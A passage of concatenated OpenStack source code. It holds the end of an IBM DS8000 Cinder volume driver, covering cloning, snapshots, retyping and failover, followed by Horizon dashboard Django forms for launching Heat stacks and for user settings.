pool, find_new_pid, excluded_lss)
return self._helper.create_lun(lun)
except restclient.LssFullException:
msg = _LW("LSS %s is full, find another one.")
LOG.warning(msg, lun.lss_pair['source'][1])
excluded_lss.append(lun.lss_pair['source'][1])
@proxy.logger
def _clone_lun(self, src_lun, tgt_lun):
self._assert(src_lun.size <= tgt_lun.size,
_('Target volume should be bigger or equal '
'to the Source volume in size.'))
self._ensure_vol_not_fc_target(src_lun.ds_id)
# volume ID of src_lun and tgt_lun will be the same one if tgt_lun is
# image-volume, because _clone_image_volume in manager.py does not pop
# the provider_location.
if (tgt_lun.ds_id is None) or (src_lun.ds_id == tgt_lun.ds_id):
# It is a preferred practice to locate the FlashCopy target
# volume on the same DS8000 server as the FlashCopy source volume.
pool = self._helper.get_pool(src_lun.ds_id[0:2])
# flashcopy to larger target only works with thick vols, so we
# emulate for thin by extending after copy
if tgt_lun.type_thin and tgt_lun.size > src_lun.size:
tmp_size = tgt_lun.size
tgt_lun.size = src_lun.size
self._create_lun_helper(tgt_lun, pool)
tgt_lun.size = tmp_size
else:
self._create_lun_helper(tgt_lun, pool)
else:
self._assert(
src_lun.size == tgt_lun.size,
_('When target volume is pre-created, it must be equal '
'in size to source volume.'))
finished = False
try:
vol_pairs = [{
"source_volume": src_lun.ds_id,
"target_volume": tgt_lun.ds_id
}]
self._helper.start_flashcopy(vol_pairs)
fc_finished = self._helper.wait_flashcopy_finished(
[src_lun], [tgt_lun])
if (fc_finished and
tgt_lun.type_thin and
tgt_lun.size > src_lun.size):
param = {
'cap': self._helper._gb2b(tgt_lun.size),
'captype': 'bytes'
}
self._helper.change_lun(tgt_lun.ds_id, param)
finished = fc_finished
finally:
if not finished:
self._helper.delete_lun(tgt_lun)
return tgt_lun
def _ensure_vol_not_fc_target(self, vol_hex_id):
for cp in self._helper.get_flashcopy(vol_hex_id):
if cp['targetvolume']['id'] == vol_hex_id:
msg = (_('Volume %s is currently a target of another '
'FlashCopy operation') % vol_hex_id)
raise restclient.APIException(data=msg)
@proxy._trace_time
def create_volume(self, volume):
lun = self._create_lun_helper(Lun(volume))
if lun.type_replication:
lun = self._replication.create_replica(lun)
return lun.get_volume_update()
@proxy._trace_time
def create_cloned_volume(self, target_vol, source_vol):
lun = self._clone_lun(Lun(source_vol), Lun(target_vol))
if lun.type_replication:
lun = self._replication.create_replica(lun)
return lun.get_volume_update()
@proxy._trace_time
def create_volume_from_snapshot(self, volume, snapshot):
lun = self._clone_lun(Lun(snapshot, is_snapshot=True), Lun(volume))
if lun.type_replication:
lun = self._replication.create_replica(lun)
return lun.get_volume_update()
@proxy._trace_time
def extend_volume(self, volume, new_size):
lun = Lun(volume)
param = {
'cap': self._helper._gb2b(new_size),
'captype': 'bytes'
}
if lun.type_replication:
if not self._active_backend_id:
self._replication.delete_pprc_pairs(lun)
self._helper.change_lun(lun.ds_id, param)
self._replication.extend_replica(lun, param)
self._replication.create_pprc_pairs(lun)
else:
msg = (_("The volume %s has been failed over, it is "
"not suggested to extend it.") % lun.ds_id)
raise exception.CinderException(data=msg)
else:
self._helper.change_lun(lun.ds_id, param)
@proxy._trace_time
def volume_exists(self, volume):
return self._helper.lun_exists(Lun(volume).ds_id)
@proxy._trace_time
def delete_volume(self, volume):
lun = Lun(volume)
if lun.type_replication:
lun = self._replication.delete_replica(lun)
self._helper.delete_lun(lun)
@proxy._trace_time
def create_snapshot(self, snapshot):
return self._clone_lun(Lun(snapshot['volume']), Lun(
snapshot, is_snapshot=True)).get_volume_update()
@proxy._trace_time
def delete_snapshot(self, snapshot):
self._helper.delete_lun(Lun(snapshot, is_snapshot=True))
@proxy._trace_time
def migrate_volume(self, ctxt, volume, backend):
# this and retype is a complete mess, pending cinder changes for fix.
# currently this is only for migrating between pools on the same
# physical machine but different cinder.conf backends.
# volume not allowed to get here if cg or repl
# should probably check volume['status'] in ['available', 'in-use'],
# especially for flashcopy
stats = self.meta['stat']
if backend['capabilities']['vendor_name'] != stats['vendor_name']:
raise exception.VolumeDriverException(_(
'source and destination vendors differ.'))
if backend['capabilities']['serial_number'] != stats['serial_number']:
raise exception.VolumeDriverException(_(
'source and destination serial numbers differ.'))
new_pools = self._helper.get_pools(
backend['capabilities']['extent_pools'])
lun = Lun(volume)
cur_pool_id = self._helper.get_lun(lun.ds_id)['pool']['id']
cur_node = self._helper.get_storage_pools()[cur_pool_id]['node']
# try pools in same rank
for pid, pool in new_pools.items():
if pool['node'] == cur_node:
try:
self._helper.change_lun(lun.ds_id, {'pool': pid})
return (True, None)
except Exception:
pass
# try pools in opposite rank
for pid, pool in new_pools.items():
if pool['node'] != cur_node:
try:
new_lun = lun.shallow_copy()
self._create_lun_helper(new_lun, pid, False)
lun.data_type = new_lun.data_type
self._clone_lun(lun, new_lun)
volume_update = new_lun.update_volume(lun)
try:
self._helper.delete_lun(lun)
except Exception:
pass
return (True, volume_update)
except Exception:
# will ignore missing ds_id if failed create volume
self._helper.delete_lun(new_lun)
return (False, None)
@proxy._trace_time
def retype(self, ctxt, volume, new_type, diff, host):
"""retype the volume.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def _get_volume_type(key, value):
extra_specs = diff.get('extra_specs')
specific_type = extra_specs.get(key) if extra_specs else None
if specific_type:
old_type = (True if str(specific_type[0]).upper() == value
else False)
new_type = (True if str(specific_type[1]).upper() == value
else False)
else:
old_type = None
new_type = None
return old_type, new_type
def _convert_thin_and_thick(lun, new_type):
new_lun = lun.shallow_copy()
new_lun.type_thin = new_type
self._create_lun_helper(new_lun)
self._clone_lun(lun, new_lun)
try:
self._helper.delete_lun(lun)
except Exception:
pass
lun.ds_id = new_lun.ds_id
lun.data_type = new_lun.data_type
lun.type_thin = new_type
return lun
lun = Lun(volume)
# check thin or thick
old_type_thin, new_type_thin = _get_volume_type(
'drivers:thin_provision', 'True'.upper())
# check replication capability
old_type_replication, new_type_replication = _get_volume_type(
'replication_enabled', strings.METADATA_IS_TRUE)
# start retype
if old_type_thin != new_type_thin:
if old_type_replication:
if not new_type_replication:
lun = self._replication.delete_replica(lun)
lun = _convert_thin_and_thick(lun, new_type_thin)
else:
msg = (_("The volume %s is in replication relationship, "
"it is not supported to retype from thin to "
"thick or vice versus.") % lun.ds_id)
raise exception.CinderException(msg)
else:
lun = _convert_thin_and_thick(lun, new_type_thin)
if new_type_replication:
lun.type_replication = True
lun = self._replication.enable_replication(lun)
else:
if not old_type_replication and new_type_replication:
lun.type_replication = True
lun = self._replication.enable_replication(lun)
elif old_type_replication and not new_type_replication:
lun = self._replication.delete_replica(lun)
lun.type_replication = False
return True, lun.get_volume_update()
@synchronized('OpenStackCinderIBMDS8KMutexConnect-', external=True)
@proxy._trace_time
@proxy.logger
def initialize_connection(self, volume, connector, **kwargs):
"""Attach a volume to the host."""
vol_id = Lun(volume).ds_id
LOG.info(_LI('Attach the volume %s.'), vol_id)
return self._helper.initialize_connection(vol_id, connector, **kwargs)
@synchronized('OpenStackCinderIBMDS8KMutexConnect-', external=True)
@proxy._trace_time
@proxy.logger
def terminate_connection(self, volume, connector, force=False, **kwargs):
"""Detach a volume from a host."""
vol_id = Lun(volume).ds_id
LOG.info(_LI('Detach the volume %s.'), vol_id)
return self._helper.terminate_connection(vol_id, connector,
force, **kwargs)
@proxy.logger
def create_consistencygroup(self, ctxt, group):
"""Create a consistency group."""
return self._helper.create_group(ctxt, group)
@proxy.logger
def delete_consistencygroup(self, ctxt, group, volumes):
"""Delete a consistency group."""
luns = [Lun(volume) for volume in volumes]
return self._helper.delete_group(ctxt, group, luns)
@proxy._trace_time
def create_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
"""Create a consistency group snapshot."""
return self._create_group_snapshot(ctxt, cgsnapshot, snapshots, True)
def _create_group_snapshot(self, ctxt, cgsnapshot, snapshots,
cg_enabled=False):
snapshots_model_update = []
model_update = {'status': fields.GroupStatus.AVAILABLE}
src_luns = [Lun(snapshot['volume']) for snapshot in snapshots]
tgt_luns = [Lun(snapshot, is_snapshot=True) for snapshot in snapshots]
try:
if src_luns and tgt_luns:
self._clone_group(src_luns, tgt_luns, cg_enabled)
except restclient.APIException:
model_update['status'] = fields.GroupStatus.ERROR
LOG.exception(_LE('Failed to create group snapshot.'))
for tgt_lun in tgt_luns:
snapshot_model_update = tgt_lun.get_volume_update()
snapshot_model_update.update({
'id': tgt_lun.os_id,
'status': model_update['status']
})
snapshots_model_update.append(snapshot_model_update)
return model_update, snapshots_model_update
@proxy._trace_time
@proxy.logger
def delete_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
"""Delete a consistency group snapshot."""
return self._delete_group_snapshot(ctxt, cgsnapshot, snapshots)
def _delete_group_snapshot(self, ctxt, group_snapshot, snapshots):
snapshots_model_update = []
model_update = {'status': fields.GroupStatus.DELETED}
snapshots = [Lun(s, is_snapshot=True) for s in snapshots]
if snapshots:
try:
self._helper.delete_lun(snapshots)
except restclient.APIException as e:
model_update['status'] = fields.GroupStatus.ERROR_DELETING
LOG.error(_LE("Failed to delete group snapshot. "
"Error: %(err)s"),
{'err': e})
for snapshot in snapshots:
snapshots_model_update.append({
'id': snapshot.os_id,
'status': model_update['status']
})
return model_update, snapshots_model_update
@proxy.logger
def update_consistencygroup(self, ctxt, group,
add_volumes, remove_volumes):
"""Add or remove volume(s) to/from an existing consistency group."""
return self._helper.update_group(ctxt, group,
add_volumes, remove_volumes)
@proxy._trace_time
def create_consistencygroup_from_src(self, ctxt, group, volumes,
cgsnapshot, snapshots,
source_cg, sorted_source_vols):
"""Create a consistencygroup from source.
:param ctxt: the context of the caller.
:param group: the dictionary of the consistency group to be created.
:param volumes: a list of volume dictionaries in the group.
:param cgsnapshot: the dictionary of the cgsnapshot as source.
:param snapshots: a list of snapshot dictionaries in the cgsnapshot.
:param source_cg: the dictionary of the consisgroup as source.
:param sorted_source_vols: a list of volume dictionaries
in the consisgroup.
:return model_update, volumes_model_update
"""
return self._create_group_from_src(ctxt, group, volumes, cgsnapshot,
snapshots, source_cg,
sorted_source_vols, True)
def _create_group_from_src(self, ctxt, group, volumes, cgsnapshot,
snapshots, source_cg, sorted_source_vols,
cg_enabled=False):
model_update = {'status': fields.GroupStatus.AVAILABLE}
volumes_model_update = []
if cgsnapshot and snapshots:
src_luns = [Lun(snapshot, is_snapshot=True)
for snapshot in snapshots]
elif source_cg and sorted_source_vols:
src_luns = [Lun(source_vol)
for source_vol in sorted_source_vols]
else:
msg = _("_create_group_from_src supports a group snapshot "
"source or a group source, other sources can not "
"be used.")
LOG.error(msg)
raise exception.InvalidInput(message=msg)
try:
tgt_luns = [Lun(volume) for volume in volumes]
if src_luns and tgt_luns:
self._clone_group(src_luns, tgt_luns, cg_enabled)
except restclient.APIException:
model_update['status'] = fields.GroupStatus.ERROR
msg = _LE("Failed to create group from group snapshot.")
LOG.exception(msg)
for tgt_lun in tgt_luns:
volume_model_update = tgt_lun.get_volume_update()
volume_model_update.update({
'id': tgt_lun.os_id,
'status': model_update['status']
})
volumes_model_update.append(volume_model_update)
return model_update, volumes_model_update
def _clone_group(self, src_luns, tgt_luns, cg_enabled):
for src_lun in src_luns:
self._ensure_vol_not_fc_target(src_lun.ds_id)
finished = False
try:
vol_pairs = []
for src_lun, tgt_lun in zip(src_luns, tgt_luns):
pool = self._helper.get_pool(src_lun.ds_id[0:2])
if tgt_lun.ds_id is None:
self._create_lun_helper(tgt_lun, pool)
vol_pairs.append({
"source_volume": src_lun.ds_id,
"target_volume": tgt_lun.ds_id
})
if cg_enabled:
self._do_flashcopy_with_freeze(vol_pairs)
else:
self._helper.start_flashcopy(vol_pairs)
finished = self._helper.wait_flashcopy_finished(src_luns, tgt_luns)
finally:
if not finished:
self._helper.delete_lun(tgt_luns)
@synchronized('OpenStackCinderIBMDS8KMutex-CG-', external=True)
@proxy._trace_time
def _do_flashcopy_with_freeze(self, vol_pairs):
# issue flashcopy with freeze
self._helper.start_flashcopy(vol_pairs, True)
# unfreeze the LSS where source volumes are in
lss_ids = list(set(p['source_volume'][0:2] for p in vol_pairs))
LOG.debug('Unfreezing the LSS: %s', ','.join(lss_ids))
self._helper.unfreeze_lss(lss_ids)
@proxy.logger
def create_group(self, ctxt, group):
"""Create generic volume group."""
return self._helper.create_group(ctxt, group)
@proxy.logger
def delete_group(self, ctxt, group, volumes):
"""Delete group and the volumes in the group."""
luns = [Lun(volume) for volume in volumes]
return self._helper.delete_group(ctxt, group, luns)
@proxy.logger
def update_group(self, ctxt, group, add_volumes, remove_volumes):
"""Update generic volume group."""
return self._helper.update_group(ctxt, group,
add_volumes, remove_volumes)
@proxy.logger
def create_group_snapshot(self, ctxt, group_snapshot, snapshots):
"""Create volume group snapshot."""
snapshot_group = Group(group_snapshot)
cg_enabled = True if snapshot_group.type_cg_snapshot else False
return self._create_group_snapshot(ctxt, group_snapshot,
snapshots, cg_enabled)
@proxy.logger
def delete_group_snapshot(self, ctxt, group_snapshot, snapshots):
"""Delete volume group snapshot."""
return self._delete_group_snapshot(ctxt, group_snapshot, snapshots)
@proxy._trace_time
def create_group_from_src(self, ctxt, group, volumes, group_snapshot,
sorted_snapshots, source_group,
sorted_source_vols):
"""Create volume group from volume group or volume group snapshot."""
volume_group = Group(group)
cg_enabled = True if volume_group.type_cg_snapshot else False
return self._create_group_from_src(ctxt, group, volumes,
group_snapshot, sorted_snapshots,
source_group, sorted_source_vols,
cg_enabled)
def freeze_backend(self, ctxt):
"""Notify the backend that it's frozen."""
pass
def thaw_backend(self, ctxt):
"""Notify the backend that it's unfrozen/thawed."""
pass
@proxy.logger
@proxy._trace_time
def failover_host(self, ctxt, volumes, secondary_id):
"""Fail over the volume back and forth.
if secondary_id is 'default', volumes will be failed back,
otherwize failed over.
"""
volume_update_list = []
if secondary_id == strings.PRIMARY_BACKEND_ID:
if not self._active_backend_id:
msg = _LI("Host has been failed back. doesn't need "
"to fail back again.")
LOG.info(msg)
return self._active_backend_id, volume_update_list
else:
if self._active_backend_id:
msg = _LI("Host has been failed over to %s.")
LOG.info(msg, self._active_backend_id)
return self._active_backend_id, volume_update_list
backend_id = self._replication._target_helper.backend['id']
if secondary_id is None:
secondary_id = backend_id
elif secondary_id != backend_id:
msg = (_('Invalid secondary_backend_id specified. '
'Valid backend id is %s.') % backend_id)
raise exception.InvalidReplicationTarget(message=msg)
LOG.debug("Starting failover to %s.", secondary_id)
replicated_luns = []
for volume in volumes:
lun = Lun(volume)
if lun.type_replication and lun.status == "available":
replicated_luns.append(lun)
else:
volume_update = (
self._replication.failover_unreplicated_volume(lun))
volume_update_list.append(volume_update)
if replicated_luns:
try:
if secondary_id != strings.PRIMARY_BACKEND_ID:
self._replication.do_pprc_failover(replicated_luns,
secondary_id)
self._active_backend_id = secondary_id
replicated_luns = self._switch_backend_connection(
secondary_id, replicated_luns)
else:
self._replication.start_pprc_failback(
replicated_luns, self._active_backend_id)
self._active_backend_id = ""
self._helper = self._replication._source_helper
except restclient.APIException as e:
msg = (_("Unable to failover host to %(id)s. "
"Exception= %(ex)s")
% {'id': secondary_id, 'ex': six.text_type(e)})
raise exception.UnableToFailOver(reason=msg)
for lun in replicated_luns:
volume_update = lun.get_volume_update()
volume_update['replication_status'] = (
'failed-over' if self._active_backend_id else 'enabled')
model_update = {'volume_id': lun.os_id,
'updates': volume_update}
volume_update_list.append(model_update)
else:
LOG.info(_LI("No volume has replication capability."))
if secondary_id != strings.PRIMARY_BACKEND_ID:
LOG.info(_LI("Switch to the target %s"), secondary_id)
self._switch_backend_connection(secondary_id)
self._active_backend_id = secondary_id
else:
LOG.info(_LI("Switch to the primary %s"), secondary_id)
self._switch_backend_connection(self._active_backend_id)
self._active_backend_id = ""
return secondary_id, volume_update_list
``` |
{
"source": "2020human/horizon",
"score": 2
} |
#### File: project/stacks/forms.py
```python
import json
import logging
import django
from django.conf import settings
from django.utils import html
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.debug import sensitive_variables # noqa
from oslo_utils import strutils
import six
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.images \
import utils as image_utils
from openstack_dashboard.dashboards.project.instances \
import utils as instance_utils
LOG = logging.getLogger(__name__)
def create_upload_form_attributes(prefix, input_type, name):
"""Creates attribute dicts for the switchable upload form
:type prefix: str
:param prefix: prefix (environment, template) of field
:type input_type: str
:param input_type: field type (file, raw, url)
:type name: str
:param name: translated text label to display to user
:rtype: dict
:return: an attribute set to pass to form build
"""
attributes = {'class': 'switched', 'data-switch-on': prefix + 'source'}
attributes['data-' + prefix + 'source-' + input_type] = name
return attributes
class TemplateForm(forms.SelfHandlingForm):
class Meta(object):
name = _('Select Template')
help_text = _('Select a template to launch a stack.')
# TODO(jomara) - update URL choice for template & environment files
# w/ client side download when applicable
base_choices = [('file', _('File')),
('raw', _('Direct Input'))]
url_choice = [('url', _('URL'))]
attributes = {'class': 'switchable', 'data-slug': 'templatesource'}
template_source = forms.ChoiceField(label=_('Template Source'),
choices=base_choices + url_choice,
widget=forms.Select(attrs=attributes))
attributes = create_upload_form_attributes(
'template',
'file',
_('Template File'))
template_upload = forms.FileField(
label=_('Template File'),
help_text=_('A local template to upload.'),
widget=forms.FileInput(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'template',
'url',
_('Template URL'))
template_url = forms.URLField(
label=_('Template URL'),
help_text=_('An external (HTTP) URL to load the template from.'),
widget=forms.TextInput(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'template',
'raw',
_('Template Data'))
template_data = forms.CharField(
label=_('Template Data'),
help_text=_('The raw contents of the template.'),
widget=forms.widgets.Textarea(attrs=attributes),
required=False)
attributes = {'data-slug': 'envsource', 'class': 'switchable'}
environment_source = forms.ChoiceField(
label=_('Environment Source'),
choices=base_choices,
widget=forms.Select(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'env',
'file',
_('Environment File'))
environment_upload = forms.FileField(
label=_('Environment File'),
help_text=_('A local environment to upload.'),
widget=forms.FileInput(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'env',
'raw',
_('Environment Data'))
environment_data = forms.CharField(
label=_('Environment Data'),
help_text=_('The raw contents of the environment file.'),
widget=forms.widgets.Textarea(attrs=attributes),
required=False)
if django.VERSION >= (1, 9):
# Note(Itxaka): On django>=1.9 Charfield has an strip option that
# we need to set to False as to not hit
# https://bugs.launchpad.net/python-heatclient/+bug/1546166
environment_data.strip = False
template_data.strip = False
def __init__(self, *args, **kwargs):
self.next_view = kwargs.pop('next_view')
super(TemplateForm, self).__init__(*args, **kwargs)
def clean(self):
cleaned = super(TemplateForm, self).clean()
files = self.request.FILES
self.clean_uploaded_files('template', _('template'), cleaned, files)
self.clean_uploaded_files('environment', _('environment'), cleaned,
files)
# Validate the template and get back the params.
kwargs = {}
if cleaned['environment_data']:
kwargs['environment'] = cleaned['environment_data']
try:
files, tpl =\
api.heat.get_template_files(cleaned.get('template_data'),
cleaned.get('template_url'))
kwargs['files'] = files
kwargs['template'] = tpl
validated = api.heat.template_validate(self.request, **kwargs)
cleaned['template_validate'] = validated
cleaned['template_validate']['files'] = files
cleaned['template_validate']['template'] = tpl
except Exception as e:
raise forms.ValidationError(six.text_type(e))
return cleaned
def clean_uploaded_files(self, prefix, field_label, cleaned, files):
"""Cleans Template & Environment data from form upload.
Does some of the crunchy bits for processing uploads vs raw
data depending on what the user specified. Identical process
for environment data & template data.
:type prefix: str
:param prefix: prefix (environment, template) of field
:type field_label: str
:param field_label: translated prefix str for messages
:type input_type: dict
:param prefix: existing cleaned fields from form
:rtype: dict
:return: cleaned dict including environment & template data
"""
upload_str = prefix + "_upload"
data_str = prefix + "_data"
url = cleaned.get(prefix + '_url')
data = cleaned.get(prefix + '_data')
has_upload = upload_str in files
# Uploaded file handler
if has_upload and not url:
log_template_name = files[upload_str].name
LOG.info('got upload %s' % log_template_name)
tpl = files[upload_str].read()
if tpl.startswith('{'):
try:
json.loads(tpl)
except Exception as e:
msg = _('There was a problem parsing the'
' %(prefix)s: %(error)s')
msg = msg % {'prefix': prefix, 'error': six.text_type(e)}
raise forms.ValidationError(msg)
cleaned[data_str] = tpl
# URL handler
elif url and (has_upload or data):
msg = _('Please specify a %s using only one source method.')
msg = msg % field_label
raise forms.ValidationError(msg)
elif prefix == 'template':
# Check for raw template input - blank environment allowed
if not url and not data:
msg = _('You must specify a template via one of the '
'available sources.')
raise forms.ValidationError(msg)
def create_kwargs(self, data):
kwargs = {'parameters': data['template_validate'],
'environment_data': data['environment_data']}
if data.get('stack_id'):
kwargs['stack_id'] = data['stack_id']
return kwargs
def handle(self, request, data):
kwargs = self.create_kwargs(data)
# NOTE (gabriel): This is a bit of a hack, essentially rewriting this
# request so that we can chain it as an input to the next view...
# but hey, it totally works.
request.method = 'GET'
return self.next_view.as_view()(request, **kwargs)
class ChangeTemplateForm(TemplateForm):
class Meta(object):
name = _('Edit Template')
help_text = _('Select a new template to re-launch a stack.')
stack_id = forms.CharField(label=_('Stack ID'),
widget=forms.widgets.HiddenInput)
stack_name = forms.CharField(label=_('Stack Name'),
widget=forms.TextInput(attrs={'readonly':
'readonly'}))
class PreviewTemplateForm(TemplateForm):
class Meta(object):
name = _('Preview Template')
help_text = _('Select a new template to preview a stack.')
class CreateStackForm(forms.SelfHandlingForm):
param_prefix = '__param_'
class Meta(object):
name = _('Create Stack')
environment_data = forms.CharField(
widget=forms.widgets.HiddenInput,
required=False)
if django.VERSION >= (1, 9):
# Note(Itxaka): On django>=1.9 Charfield has an strip option that
# we need to set to False as to not hit
# https://bugs.launchpad.net/python-heatclient/+bug/1546166
environment_data.strip = False
parameters = forms.CharField(
widget=forms.widgets.HiddenInput)
stack_name = forms.RegexField(
max_length=255,
label=_('Stack Name'),
help_text=_('Name of the stack to create.'),
regex=r"^[a-zA-Z][a-zA-Z0-9_.-]*$",
error_messages={'invalid':
_('Name must start with a letter and may '
'only contain letters, numbers, underscores, '
'periods and hyphens.')})
timeout_mins = forms.IntegerField(
initial=60,
label=_('Creation Timeout (minutes)'),
help_text=_('Stack creation timeout in minutes.'))
enable_rollback = forms.BooleanField(
label=_('Rollback On Failure'),
help_text=_('Enable rollback on create/update failure.'),
required=False)
def __init__(self, *args, **kwargs):
parameters = kwargs.pop('parameters')
# special case: load template data from API, not passed in params
if kwargs.get('validate_me'):
parameters = kwargs.pop('validate_me')
super(CreateStackForm, self).__init__(*args, **kwargs)
if self._stack_password_enabled():
self.fields['password'] = forms.CharField(
label=_('Password for user "%s"') % self.request.user.username,
help_text=_('This is required for operations to be performed '
'throughout the lifecycle of the stack'),
widget=forms.PasswordInput())
self._build_parameter_fields(parameters)
def _stack_password_enabled(self):
stack_settings = getattr(settings, 'OPENSTACK_HEAT_STACK', {})
return stack_settings.get('enable_user_pass', True)
def _build_parameter_fields(self, template_validate):
self.help_text = template_validate['Description']
params = template_validate.get('Parameters', {})
if template_validate.get('ParameterGroups'):
params_in_order = []
for group in template_validate['ParameterGroups']:
for param in group.get('parameters', []):
if param in params:
params_in_order.append((param, params[param]))
else:
# no parameter groups, simply sorted to make the order fixed
params_in_order = sorted(params.items())
for param_key, param in params_in_order:
field = None
field_key = self.param_prefix + param_key
field_args = {
'initial': param.get('Default', None),
'label': param.get('Label', param_key),
'help_text': html.escape(param.get('Description', '')),
'required': param.get('Default', None) is None
}
param_type = param.get('Type', None)
hidden = strutils.bool_from_string(param.get('NoEcho', 'false'))
if 'CustomConstraint' in param:
choices = self._populate_custom_choices(
param['CustomConstraint'])
field_args['choices'] = choices
field = forms.ChoiceField(**field_args)
elif 'AllowedValues' in param:
choices = map(lambda x: (x, x), param['AllowedValues'])
field_args['choices'] = choices
field = forms.ChoiceField(**field_args)
elif param_type == 'Json' and 'Default' in param:
field_args['initial'] = json.dumps(param['Default'])
field = forms.CharField(**field_args)
elif param_type in ('CommaDelimitedList', 'String', 'Json'):
if 'MinLength' in param:
field_args['min_length'] = int(param['MinLength'])
field_args['required'] = field_args['min_length'] > 0
if 'MaxLength' in param:
field_args['max_length'] = int(param['MaxLength'])
if hidden:
field_args['widget'] = forms.PasswordInput(
render_value=True)
field = forms.CharField(**field_args)
elif param_type == 'Number':
if 'MinValue' in param:
field_args['min_value'] = int(param['MinValue'])
if 'MaxValue' in param:
field_args['max_value'] = int(param['MaxValue'])
field = forms.IntegerField(**field_args)
elif param_type == 'Boolean':
field_args['required'] = False
field = forms.BooleanField(**field_args)
if field:
self.fields[field_key] = field
@sensitive_variables('password')
def handle(self, request, data):
prefix_length = len(self.param_prefix)
params_list = [(k[prefix_length:], v) for (k, v) in data.items()
if k.startswith(self.param_prefix)]
fields = {
'stack_name': data.get('stack_name'),
'timeout_mins': data.get('timeout_mins'),
'disable_rollback': not(data.get('enable_rollback')),
'parameters': dict(params_list),
'files': json.loads(data.get('parameters')).get('files'),
'template': json.loads(data.get('parameters')).get('template')
}
if data.get('password'):
fields['password'] = data.get('password')
if data.get('environment_data'):
fields['environment'] = data.get('environment_data')
try:
api.heat.stack_create(self.request, **fields)
messages.info(request, _("Stack creation started."))
return True
except Exception:
exceptions.handle(request)
def _populate_custom_choices(self, custom_type):
if custom_type == 'neutron.network':
return instance_utils.network_field_data(self.request, True)
if custom_type == 'nova.keypair':
return instance_utils.keypair_field_data(self.request, True)
if custom_type == 'glance.image':
return image_utils.image_field_data(self.request, True)
if custom_type == 'nova.flavor':
return instance_utils.flavor_field_data(self.request, True)
return []
class EditStackForm(CreateStackForm):
class Meta(object):
name = _('Update Stack Parameters')
stack_id = forms.CharField(
label=_('Stack ID'),
widget=forms.widgets.HiddenInput)
stack_name = forms.CharField(
label=_('Stack Name'),
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
@sensitive_variables('password')
def handle(self, request, data):
prefix_length = len(self.param_prefix)
params_list = [(k[prefix_length:], v) for (k, v) in data.items()
if k.startswith(self.param_prefix)]
stack_id = data.get('stack_id')
fields = {
'stack_name': data.get('stack_name'),
'timeout_mins': data.get('timeout_mins'),
'disable_rollback': not(data.get('enable_rollback')),
'parameters': dict(params_list),
'files': json.loads(data.get('parameters')).get('files'),
'template': json.loads(data.get('parameters')).get('template')
}
if data.get('password'):
fields['password'] = data.get('password')
if data.get('environment_data'):
fields['environment'] = data.get('environment_data')
try:
api.heat.stack_update(self.request, stack_id=stack_id, **fields)
messages.info(request, _("Stack update started."))
return True
except Exception:
exceptions.handle(request)
class PreviewStackForm(CreateStackForm):
class Meta(object):
name = _('Preview Stack Parameters')
def __init__(self, *args, **kwargs):
self.next_view = kwargs.pop('next_view')
super(CreateStackForm, self).__init__(*args, **kwargs)
def handle(self, request, data):
prefix_length = len(self.param_prefix)
params_list = [(k[prefix_length:], v) for (k, v) in data.items()
if k.startswith(self.param_prefix)]
fields = {
'stack_name': data.get('stack_name'),
'timeout_mins': data.get('timeout_mins'),
'disable_rollback': not(data.get('enable_rollback')),
'parameters': dict(params_list),
'files': json.loads(data.get('parameters')).get('files'),
'template': json.loads(data.get('parameters')).get('template')
}
if data.get('environment_data'):
fields['environment'] = data.get('environment_data')
try:
stack_preview = api.heat.stack_preview(self.request, **fields)
request.method = 'GET'
return self.next_view.as_view()(request,
stack_preview=stack_preview)
except Exception:
exceptions.handle(request)
```
#### File: settings/user/forms.py
```python
from datetime import datetime # noqa
from datetime import timedelta # noqa
import string
import babel
import babel.dates
from django.conf import settings
from django import shortcuts
from django.utils import encoding
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
import pytz
from horizon import forms
from horizon import messages
from horizon.utils import functions
class UserSettingsForm(forms.SelfHandlingForm):
max_value = getattr(settings, 'API_RESULT_LIMIT', 1000)
language = forms.ChoiceField(label=_("Language"))
timezone = forms.ChoiceField(label=_("Timezone"))
pagesize = forms.IntegerField(label=_("Items Per Page"),
min_value=1,
max_value=max_value)
instance_log_length = forms.IntegerField(
label=_("Log Lines Per Instance"), min_value=1,
help_text=_("Number of log lines to be shown per instance"))
@staticmethod
def _sorted_zones():
d = datetime(datetime.today().year, 1, 1)
zones = [(tz, pytz.timezone(tz).localize(d).strftime('%z'))
for tz in pytz.common_timezones]
zones.sort(key=lambda zone: int(zone[1]))
return zones
def __init__(self, *args, **kwargs):
super(UserSettingsForm, self).__init__(*args, **kwargs)
# Languages
def get_language_display_name(code, desc):
try:
desc = translation.get_language_info(code)['name_local']
desc = string.capwords(desc)
except KeyError:
# If a language is not defined in django.conf.locale.LANG_INFO
# get_language_info raises KeyError
pass
return "%s (%s)" % (desc, code)
languages = [(k, get_language_display_name(k, v))
for k, v in settings.LANGUAGES]
self.fields['language'].choices = languages
# Timezones
timezones = []
language = translation.get_language()
current_locale = translation.to_locale(language)
babel_locale = babel.Locale.parse(current_locale)
for tz, offset in self._sorted_zones():
try:
utc_offset = _("UTC %(hour)s:%(min)s") % {"hour": offset[:3],
"min": offset[3:]}
except Exception:
utc_offset = ""
if tz == "UTC":
tz_name = _("UTC")
elif tz == "GMT":
tz_name = _("GMT")
else:
tz_label = babel.dates.get_timezone_location(
tz, locale=babel_locale)
# Translators: UTC offset and timezone label
tz_name = _("%(offset)s: %(label)s") % {"offset": utc_offset,
"label": tz_label}
timezones.append((tz, tz_name))
self.fields['timezone'].choices = timezones
# When we define a help_text using any variable together with
# form field, traslation does not work well.
# To avoid this, we define here. (#1563021)
self.fields['pagesize'].help_text = (
_("Number of items to show per page (applies to the pages "
"that have API supported pagination, Max Value: %s)")
% self.max_value)
def handle(self, request, data):
response = shortcuts.redirect(request.build_absolute_uri())
lang_code = data['language']
